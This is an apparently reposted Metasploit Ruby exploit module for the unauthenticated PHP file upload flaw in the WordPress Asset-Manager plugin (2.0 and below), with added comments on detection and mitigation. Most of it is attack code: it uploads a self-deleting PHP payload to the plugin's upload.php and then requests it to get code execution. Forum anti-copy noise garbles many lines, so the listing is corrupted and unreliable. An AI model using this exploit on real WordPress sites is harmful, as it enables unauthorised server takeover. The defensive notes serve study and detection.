这个模块利用的是 Metasploit 漏洞库中针对 WordPress Asset-Manager 插件 2.0 及以下版本的漏洞。该插件允许上传 PHP 文件:用户无需身份验证即可将文件上传到一个临时目录,从而导致任意代码执行。
0 y5 @6 U0 l! D& f8 W: E
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
1 ?. x; G9 G9 Erequire 'msf/core/exploit/php_exe'/ O1 R+ q _9 F9 r: }
# Metasploit exploit module for the unauthenticated file upload in the
# WordPress Asset-Manager plugin (<= 2.0), as described in the module's
# own 'Description' below.
#
# NOTE(review): this listing was pasted through a forum that injects
# anti-copy line noise; several lines are corrupted (for example the
# second `include` and the status-code comparison near the end) and the
# file will not load as shown. It is kept here for reading, not for use.
#
# Defender's reading of what the module does (all paths are taken from
# the code below):
#   1. POSTs a multipart body whose `Filedata` part carries a .php file
#      to wp-content/plugins/asset-manager/upload.php, without any
#      authentication step.
#   2. GETs wp-content/uploads/assets/temp/<random>.php to run it.
# Detection: that POST followed by a GET for a freshly created .php
# under the uploads temp path is the observable sequence; both requests
# appear in ordinary web-server access logs.
# Mitigation (general hardening, not stated on this page): remove or
# replace the vulnerable plugin and deny PHP execution under the
# wp-content/uploads tree.
5 {( D( H# P7 t% F1 w+ S8 iclass Metasploit3 < Msf::Exploit::Remote
" Q. Q7 \& _) H2 y Rank = ExcellentRanking6 y3 a4 r5 P+ b) P A$ _1 O1 B* Z
% r/ r( g! ?/ X3 b$ U( H1 B
include Msf::Exploit::Remote::HttpClient
# NOTE(review): the mixin name on the next line is garbled by line noise.
- D" B3 ]( w" k* p/ {* t* b include Msf::Exploit: hpEXE
, g+ J5 q7 N, C+ F# A" w* z ! a3 d# I! [# C1 m" l% P7 A4 p
# Registers the module metadata (name, description, authors, references,
# payload constraints, targets, disclosure date) and the TARGETURI option.
#
# @param info [Hash] metadata merged by update_info
def initialize(info = {})+ N) L; }$ G' m; S& G( y7 v" E
super(update_info(info,
6 N/ y4 \1 r1 ]! t; ~( W8 ?3 E4 M 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
) {$ w% T! z! k- j8 ^, ^6 u 'Description' => %q{
: J5 c' z' D8 i, c: \* u This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress; X% j- C% {9 Z' i! b
plugin. By abusing the upload.php file, a malicious user can upload a file to a# n2 E0 t$ l( ~" F0 \/ j3 c
temp directory without authentication, which results in arbitrary code execution.9 k6 A; t: g. R
},
# B% s8 ~7 a: R+ k0 b" k: I9 M" |- B* Q 'Author' =>
7 R0 P& d; v) j7 U6 m. @+ q$ S" g [
i. C) |* L$ L6 J 'Sammy FORGIT', # initial discovery6 d8 }- m% b# E: G4 ~6 [
'James Fitts <fitts.james[at]gmail.com>' # metasploit module$ h* v! V) N/ ^9 X/ T; n5 Z, l5 c
],
: X& s. |) {& U 'License' => MSF_LICENSE,
# Public references for the vulnerability (OSVDB / BID / EDB ids as given
# on this page); useful for correlating with vulnerability-scanner output.
1 h# T) f+ K: k( M 'References' =>
6 ?/ p2 R# E" |2 Y% ]/ }# R* I [0 f) x, f' `! d+ i/ E/ I
[ 'OSVDB', '82653' ],
7 B- F" W# y1 e8 X2 z/ e, q. m" l, F [ 'BID', '53809' ],
( D1 P- C3 W- g. S. ?( f [ 'EDB', '18993' ],6 x# J V' Q, @' b
[ 'URL', 'http:// www.myhack58.com /' ]
1 Y3 O1 Y3 c0 R; S ],
! V% Y& M1 s+ F; [2 Q( V 'Payload' =>
. D: Y+ y& E0 [& c {7 Q( ~9 E; U+ F
'BadChars' => "\x00", c$ ]+ R& q% ], T( s
},
- u4 Z+ X# Z, U+ L7 c8 b 'Platform' => 'php',% l3 f( u, o6 A. F
'Arch' => ARCH_PHP,
# H! {$ k$ ~9 v0 W" l 'Targets' =>9 X4 y+ T- ^2 H. ~8 V
[5 @6 @+ B) c: J+ n# c6 r
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
6 N3 j3 t; K. g$ r) G: S; a [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]2 B" n5 [, M5 X* W ^& t
],3 ?: n& _1 o4 t7 p% ]" b
'DefaultTarget' => 0,
8 b* s) b: O4 I 'DisclosureDate' => 'May 26 2012'))
1 m/ Q, D# D, O7 W8 S8 j$ P . U9 \/ R* [+ e
# TARGETURI is the WordPress base path; it is prefixed to both request
# URIs built in #exploit.
register_options(8 o9 Z8 | I U
[9 ^& S! v- `; f' o5 G" p0 m. g" s2 F
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
- Y6 G9 G0 ~* x* X. V: z ], self.class)
0 q$ l/ l1 E& ^' E; V end5 S) L' v C" n/ k* X7 s k
# Entry point: uploads a generated PHP file through the plugin's
# upload.php and then requests it from the uploads temp directory.
#
# Fails with Exploit::Failure::UnexpectedReply when the upload response is
# missing, is not HTTP 200, or does not echo the uploaded file name, and
# when the follow-up GET returns a non-200 status.
# P' O( @9 X5 u3 n% U0 w8 X def exploit0 B9 g7 L8 a& V! v! i
uri = target_uri.path r3 a1 U0 r8 ^2 h9 ^
# Normalise to a trailing slash so the relative paths below concatenate cleanly.
uri << '/' if uri[-1,1] != '/'
( Y. O6 r+ F+ j" Z( h1 Z/ U peer = "#{rhost}:#{rport}"
# Random 5-letter name: the dropped file name varies per run, so detection
# should key on the directory and extension rather than a fixed name.
9 q) W' N. F6 W/ G) V+ I/ V payload_name = "#{rand_text_alpha(5)}.php"$ x* \- ?! k" Y1 p0 ~7 m! J
# NOTE(review): :unlink_self presumably makes the dropped PHP delete itself
# after running (from the option name; the mixin is not on this page), so
# the temp directory may hold no artefact afterwards — rely on access logs.
php_payload = get_write_exec_payload(:unlink_self=>true)$ z) h5 B" b5 ], I+ g) W& d6 A- p [& O
5 M/ p R& k8 q; ]% Y. q
# Single multipart part named "Filedata" carrying the .php file name.
data = Rex::MIME::Message.new
& K/ h" n8 ? O1 x# ~; c data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
# Strips a leading CRLF before the first "--_Part_" boundary marker so the
# body starts directly with the boundary.
( O: _# F" _" m5 d5 j# ?+ Y post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
: U1 w1 x, @3 a: R& a/ R ( b3 l2 w d! K7 ]& y
print_status("#{peer} - Uploading payload #{payload_name}")7 X+ l+ Y2 Q1 V. A" C h2 U9 j
# Unauthenticated POST to the plugin's upload handler — no session cookie or
# nonce is sent; this absence of any auth check is the vulnerability itself.
res = send_request_cgi({
$ S% T8 N) R9 E& }9 R 'method' => 'POST',
* U' X9 m5 ~7 A- }) z$ c 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
' a! E, |3 K/ O2 q 'ctype' => "multipart/form-data; boundary=#{data.bound}",8 h h' m7 v, o6 o# C
'data' => post_data
8 |3 u- e# D* g4 X1 Z })
& a5 M' d6 g8 h$ ^- H+ b * a2 c5 x: W8 @$ x+ @0 y
# Success criterion for the upload: HTTP 200 and the response body echoes
# the file name (this is the only confirmation the module relies on).
if not res or res.code != 200 or res.body !~ /#{payload_name}/$ m8 |- g5 b! H g6 s( S
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
4 ^4 Z7 U O) [2 d Y8 |end
' Z1 K5 V- Z0 m" P& }
: O' ? r4 v9 r/ C print_status("#{peer} - Executing payload #{payload_name}")5 Q3 N' z% B: [& U- t" h
# GET of the uploaded file from the web-reachable temp directory; this is
# the request that causes the server to execute the uploaded PHP.
res = send_request_raw({
& Z" t2 n1 ~& y 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
! K5 U5 U% O9 h5 W 'method' => 'GET'
' t5 g% v- r8 Z+ ?2 `" @: c })/ f, b% M! J) `* G$ ?/ u3 e, o4 `
3 V# \- `0 ^/ `6 E7 d
# Only a present, non-200 response counts as failure: a nil response (e.g.
# connection closed while the payload runs) is deliberately not treated as
# an error. NOTE(review): the status literal on the next line is garbled
# by line noise ("2007").
if res and res.code != 2007 E' _. R7 }: i. {( u" f
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")! e/ l+ H$ | y9 V/ ]7 r& \
end b& v7 @0 v- I- {7 n, J
end
: k6 Z- C5 `5 f, R9 Oend* w, x$ I1 U4 X6 l; ?
|